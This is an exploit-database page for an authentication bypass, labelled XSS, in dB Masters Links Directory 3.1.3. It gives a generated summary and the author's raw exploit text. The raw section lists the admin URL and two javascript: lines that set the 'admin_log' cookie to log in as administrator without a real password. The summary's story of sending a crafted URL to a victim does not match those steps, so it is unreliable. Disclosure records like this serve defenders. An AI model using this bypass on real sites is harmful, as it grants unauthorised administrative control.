header-logo
Suggest Exploit
vendor:
dB Masters Links Directory
by:
indoushka
7.5
CVSS
HIGH
XSS
79
CWE
Product Name: dB Masters Links Directory
Affected Version From: dB Masters Links Directory 3.1.3
Affected Version To: dB Masters Links Directory 3.1.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
2009

dB Masters Multimedia Insecure Cookie Handling Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted URL to the target user. The URL contains a malicious JavaScript code which is executed in the user's browser when the URL is accessed. The malicious code can be used to set a cookie with the name 'admin_log' and value 'indoushka' and path '/'. This allows the attacker to login to the application without a password.

Mitigation:

The application should validate the cookie values and reject any malicious input.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : dB Masters Multimedia Insecure Cookie Handling Vulnerability            |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : Powered by dB Masters Multimedia (dB Masters Links Directory 3.1.3)     |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://server/links/admin.php
| 2- javascript:document.cookie="admin_log=in;path=/";
| login whith the pass "in"
| 3- javascript:document.cookie="admin_log=indoushka;path=/";
| login whith out pss
| tested in Opera V.10
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------